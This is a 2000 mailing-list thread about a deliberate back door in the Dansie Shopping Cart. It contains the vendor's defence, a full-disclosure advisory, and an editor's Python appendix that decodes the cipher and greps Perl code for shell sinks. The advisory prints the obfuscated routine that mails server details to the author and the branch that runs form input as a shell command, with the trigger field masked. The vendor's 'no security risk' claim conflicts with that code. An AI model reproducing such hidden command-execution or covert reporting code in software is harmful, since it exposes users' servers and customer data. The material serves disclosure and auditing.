This is what people at dansie said:
---------------------------------
At 05:29 AM 4/14/00 , you wrote:
>
> I've already sent you an email...
> Tell me why there's a way that anyone can execute code by using your
script..
> I want an answer right now.
>
Luciano,
The software has a copyright protection feature that poses no security risk
to your website or your web server. It's designed to prevent software piracy
and prevent pirates from running unlicensed copies. The cart is designed with
security in mind. For more details on security, see section 1 in the ReadMe.
http://www.dansie.net/cart_readme.html
Last month a person violated the software license agreement and tried to
modify the script and remove the copyright credit to www.dansie.net. After
they decoded the software copyright protection feature, they posted it on
some message boards. If I can be of further help with the cart or if you
would like an upgrade of the latest version, let me know.
Here is a snippet from our web host:
Nothing to be worried about on the mall version. However, if any of your
clients have a single user licence cart, now that this is public information,
if the cart version is 3.04 and above you might request an upgrade from Craig
Dansie.
Basically, it allows Craig to prevent thieves from stealing his script. I
have known about it for a while.
The "main" reason this guy is ticked off is because he "violated" the
copyright of Craig Dansie and hacked the script. It is not said so in so
many words, but basically.. he did. Craig scrambled his vars.dat because he
would not respond to Craig regarding the copyright violation.
If the cart is registered for a particular domain name, it will only work on
that one domain name. Craig puts a security code in all carts to ensure it
cannot be used on a different domain name. This is his right to do so to
protect his livelihood.
One thing this article does not cover is the fact that Craig "does" rotate
the codes for the cart. On about a weekly schedule. However, since this
guy has made public this information, ( yes I received two copies of this
email as well )... it might behoove you to request an upgrade to any single
user cart.
There are "no" processes Craig can run on the server as this email suggests.
Yes, he can wipe the vars.dat to protect his copyright and prevent the cart
from working, but the only people that need to worry are "thieves" anyway.
The cart "cannot" retrieve cc information or any other information that
could cause a security risk.
I personally talked with Brian McWilliams at www.internetnews.com on the
phone this morning. He did not mention a single thing I said regarding the
cart. He is out for a "story".
Give me a call if you have any questions.
James
Stormer Hosting
http://stormerhosting.com
[EMAIL PROTECTED]
Regards,
Craig Dansie
Dansie Shopping Cart
http://www.dansie.net
FAQ: http://www.dansie.net/cgi-bin/faq.pl
-----------------------------------------------------
----- Original Message -----
From: Luciano Ramos <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, April 13, 2000 9:58 AM
Subject: Re: Back Door in Commercial Shopping Cart
> I have purchased dansie's shopping cart and I have been using it for a
> while. The version of the cart I am currently using is 2.84; this version
> has the there, there2, there3 functions and the mail sending is in the
> code, but as of 2.84 the system("FORM(xxxxxx)") is not implemented.
> A couple of months ago people at dansie sent me the upgrade of the cart;
> it was version 3.03. This version does have the system call. I've already
> sent a mail to dansie to see what he says ...
>
> Thanks ..
>
> Luciano Ramos
> [EMAIL PROTECTED]
>
> ----- Original Message -----
> From: Joe <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, April 11, 2000 9:24 PM
> Subject: Back Door in Commercial Shopping Cart
>
>
> > Trojanized Commercial Shopping Cart
> > ===============================================================
> >
> > Dansie Shopping Cart
> >
> > Version : 3.04 (presumably earlier versions as well)
> > Author : Craig Dansie
> > URL : http://www.dansie.net/
> > Language : Perl (both NT and Unix platforms are vulnerable)
> > License : Commercial, starting at $150.00
> > Copyright Dec 10, 1997-2000, Dansie Website Design
> >
> >
> > Synopsis : This program -deliberately- allows arbitrary commands to be
> > executed on the victim server.
> >
> >
> > One of our clients, while installing and configuring the Dansie Shopping
> > Cart, ran into difficulty integrating PGP, the shopping cart program, and
> > our secure server setup. While trying to assist our client with the cart
> > and PGP configuration we discovered a couple of things.
> >
> > The CGI, under certain conditions, sends an email to the author of the
> > Dansie shopping cart software, '[EMAIL PROTECTED]'. This is not readily
> > apparent as the code that handles this transaction incorporates a simple
> > Caesar Cipher to hide the email address. The cipher is handled via the
> > subroutine 'there2':
> >
> > ------
> > sub there2
> > {
> >     $_ = "$_[0]";
> >     tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
> >     tr/_/-/;
> >     tr/\@/\./;
> >     return $_;
> > }
> > -------
> >
> > The call that creates this email address and sends the mail is the
> > function 'there3'.
> >
> > -------
> > sub there3
> > {
> >     # Only on non-NT hosts where a sendmail-style $mailprog exists
> >     if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
> >     {
> >         $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');  # decodes to tech@dansie.net
> >         $b = &there2('8v59_3jhhzi8');                                   # decodes to tech-support
> >         pop(@there2);
> >         pop(@there2);
> >         $c = &there2("@there2");
> >         open (TECH, "|$mailprog $a");
> >         print TECH "To: $a\n";
> >         print TECH "From: $a\n";
> >         print TECH "Subject: $b\n\n";
> >         print TECH "$path3\n";
> >         print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
> >         print TECH "$c\n";
> >         print TECH "$e $there\n" if ($e);
> >         close (TECH);
> >     }
> > }
> > -------
> >
> > The ciphered strings, when passed through 'there2', result in:
> >
> > 8v59 == tech
> > kte3cv == dansie
> > ev8 == net
> > 8v59_3jhhzi8 == tech-support
> > $a == [EMAIL PROTECTED]
> > $b == Subject: tech-support
> >
> > This seems curious, but plausible reasons could include ensuring license
> > compliance, or maybe the cart automatically sends this email when an error
> > occurs. The program definitely goes out of its way to hide the fact that the
> > mail is being sent.
> >
> > While going through the rest of the code we discovered a much more
> > interesting item.
> >
> > (We've masked out the actual trigger element with question marks)
> >
> > ----------
> > if ( ( ($FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) ||
> >      ( ($FORM{'?????????'}) && (!$d) ) )
> > {
> >     if ( $ENV{'OS'} )
> >     {
> >         system("$FORM{'?????????'}");      # Windows NT: %OS% is set
> >     }
> >     else
> >     {
> >         open(ELIF,"|$FORM{'?????????'}");  # Unix: run the value as a piped command
> >     }
> >     exit;
> > }
> > ---------
> >
> > The form element '?????????', which was originally a pseudo-random
> > appearing nine-digit string of letters and numbers, allows an intruder to
> > execute any command on the server with the same privileges as the CGI
> > process itself. Although this is a full disclosure list, the trigger
> > element is obscured to prevent the script kiddies from running away with
> > this back door. If you own the cart, then you have access to the source
> > code and can discover the element in question easily enough on your own.
> >
> > Further searches through the code reveal that this form element is immune
> > to data validation - it gets passed into this code fragment unchallenged.
> >
> > The '$d' variable of the condition which permits the back door to function
> > is set elsewhere in the program to contain the string 'dansie'. (Again,
> > using the ciphertext algorithm.) This indicates that the form element won't
> > work on Dansie's own host, but will work on anyone else's. There are
> > additional problems with the 'there' function but we'll leave them as
> > exercises for the reader to decipher.
> >
> > Dansie.net, armed with the server name and URL to the CGI executable
> > provided by the cloaked email routine, would be able to run commands on any
> > web server on the Internet that has the Dansie Shopping Cart installed. It
> > takes little imagination to dream up the potential havoc and privacy
> > violations this level of access could result in; from stealing private
> > customer records to a full-blown crack of an E-Commerce server.
> >
> > When checking to see if this was a known issue, the following post from
> > "Kasey Johns" <kasey at corridor dot net>, made a little over a week ago,
> > was discovered in alt.comp.perlcgi.freelance:
> >
> > http://www.deja.com/getdoc.xp?AN=601644315
> > Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849
> >
> > We won't quote Kasey's posts here; in brief, Kasey also discovered the back
> > door and cloaked email routines. Kasey also provides evidence in the post
> > to indicate that not only is Dansie well aware of the back door routine,
> > but may be actively attempting to utilize it.
> >
> > Based upon our own investigation, the information Kasey posted, and our own
> > firewall logs (see below), it is our opinion that the back door within
> > Dansie.net's shopping cart can best be summarized as follows:
> >
> > 1. The back door is very deliberate.
> > 2. It isn't unique to the one copy we have access to here.
> > 3. *Is being actively utilized by the author of the CGI.
> >
> > * Based upon the log snippet in Kasey's post showing attempted access to
> > the CGI from an Earthlink dial-up IP (209.179.141.0/24). According to
> > Kasey, access to the CGI was attempted less than 30 minutes after the cart
> > was installed.
> >
> > When we noticed the attempted usage of Kasey's server, a quick check of our
> > own firewall logs revealed the following:
> >
> > Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
> > {repeated several dozen times}
> >
> > We can only assume these attempts, made from the same /24 on Earthlink's
> > dial-ups as the one used to probe Kasey's server, were from the author of
> > the shopping cart.
> >
> > We will not try to hazard a guess as to why Dansie.net felt the need to
> > include a back door within their shopping cart software. Whatever their
> > reasoning may be, it is our opinion that no reason, no matter how well
> > thought out or rationalized, justifies the existence of this back door. No
> > reasoning can possibly explain away a routine that deliberately allows an
> > intruder unrestricted and unauthorized access to any server on the Internet
> > that has the Dansie Shopping Cart installed.
> >
> > --
> > Joe Technical Support
> > General Support: [EMAIL PROTECTED] Blarg! Online Services, Inc.
> > Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
> >
>
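Editor's note, added after the thread (this is not code from the cart, from Dansie.net, or from any of the posters): the example below ports the `there2` substitution quoted in the advisory to Python so the claimed decodings (8v59, kte3cv, ev8, 8v59_3jhhzi8) can be checked, models the guard around the `system()`/`open()` branch to show on which hosts it fires, and greps Perl source for `$FORM{...}` reaching `system()` or a piped `open()`. The nine-character trigger is masked in the advisory, so `TRIGGER` is a made-up placeholder, and `SAMPLE_PERL` is a constructed stand-in for the quoted snippet rather than the cart's real source.

```python
"""Added example (editor's own code, not the Dansie cart's): port of the
there2 substitution, a boolean model of the back-door guard, and a grep for
$FORM{...} reaching system()/open() in Perl CGI source."""
import re
from typing import Dict, List, Optional

# SEARCHLIST and REPLACEMENTLIST of tr/a-z0-9/.../ in sub there2, copied verbatim.
TR_SEARCH = "abcdefghijklmnopqrstuvwxyz0123456789"
TR_REPLACE = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth"
assert len(TR_SEARCH) == len(TR_REPLACE) == 36 and len(set(TR_REPLACE)) == 36

# tr/// sends TR_SEARCH[i] to TR_REPLACE[i]. The cart stores the obfuscated
# strings and runs there2 on them at run time, so that direction is "decode".
_DECODE = str.maketrans(TR_SEARCH, TR_REPLACE)
_ENCODE = str.maketrans(TR_REPLACE, TR_SEARCH)  # inverse exists: the map is a permutation


def there2(s: str) -> str:
    """Python port of sub there2: tr/a-z0-9/.../, then tr/_/-/, then tr/@/./."""
    return s.translate(_DECODE).replace("_", "-").replace("@", ".")


def there2_inverse(s: str) -> str:
    """Turn plaintext back into the form the script stores ('-' -> '_', '.' -> '@')."""
    return s.replace("-", "_").replace(".", "@").translate(_ENCODE)


def tech_address() -> str:
    """Rebuild $a exactly the way there3 concatenates it."""
    return there2("8v59") + "@" + there2("kte3cv") + "." + there2("ev8")


def backdoor_fires(form: Dict[str, str], http_host: str,
                   d: Optional[str], trigger: str) -> bool:
    """Model of the guard: (FORM{t} && HTTP_HOST !~ /$d/) || (FORM{t} && !$d)."""
    if not form.get(trigger):
        return False
    if not d:
        return True
    return re.search(d, http_host) is None


# Unvalidated form data handed straight to a shell, in either of the two forms
# the advisory quotes.
_SHELL_SINK = re.compile(
    r"""system\s*\(\s*["']?\$FORM\{            # system("$FORM{...}")
      | open\s*\(\s*\w+\s*,\s*["']\|\$FORM\{   # open(FH, "|$FORM{...}")
    """,
    re.X,
)


def find_shell_sinks(perl_source: str) -> List[int]:
    """1-based line numbers where $FORM{...} feeds system() or a piped open()."""
    return [n for n, line in enumerate(perl_source.splitlines(), 1)
            if _SHELL_SINK.search(line)]


TRIGGER = "x7q2m9k4p"  # placeholder: the real nine-character key is masked in the advisory

# Constructed sample modelled on the quoted snippet, with the placeholder key.
SAMPLE_PERL = f"""
if ((($FORM{{'{TRIGGER}'}}) && ($ENV{{'HTTP_HOST'}} !~ /($d)/)) || (($FORM{{'{TRIGGER}'}}) && (!$d))) {{
    if ($ENV{{'OS'}}) {{
        system("$FORM{{'{TRIGGER}'}}");
    }} else {{
        open(ELIF,"|$FORM{{'{TRIGGER}'}}");
    }}
    exit;
}}
print "Content-type: text/html\\n\\n";
"""

if __name__ == "__main__":
    print(there2("8v59"), there2("kte3cv"), there2("ev8"), there2("8v59_3jhhzi8"))
    print(tech_address())
    print("shell sinks on lines:", find_shell_sinks(SAMPLE_PERL))
    print("fires on example.com:", backdoor_fires({TRIGGER: "id"}, "www.example.com", "dansie", TRIGGER))
    print("fires on dansie.net:", backdoor_fires({TRIGGER: "id"}, "www.dansie.net", "dansie", TRIGGER))
```

Run it and the four decoded strings match the advisory's table, `tech_address()` is the address `there3` mails, `find_shell_sinks` flags the `system()` and `open()` lines of the sample, and `backdoor_fires` is true for any host whose `HTTP_HOST` does not contain `dansie` (or whenever `$d` is empty). The grep is a cheap audit to run over any Perl CGI, not only this cart: form input reaching `system()`, backticks, or a `"|..."` open is a shell injection regardless of whether it was put there on purpose.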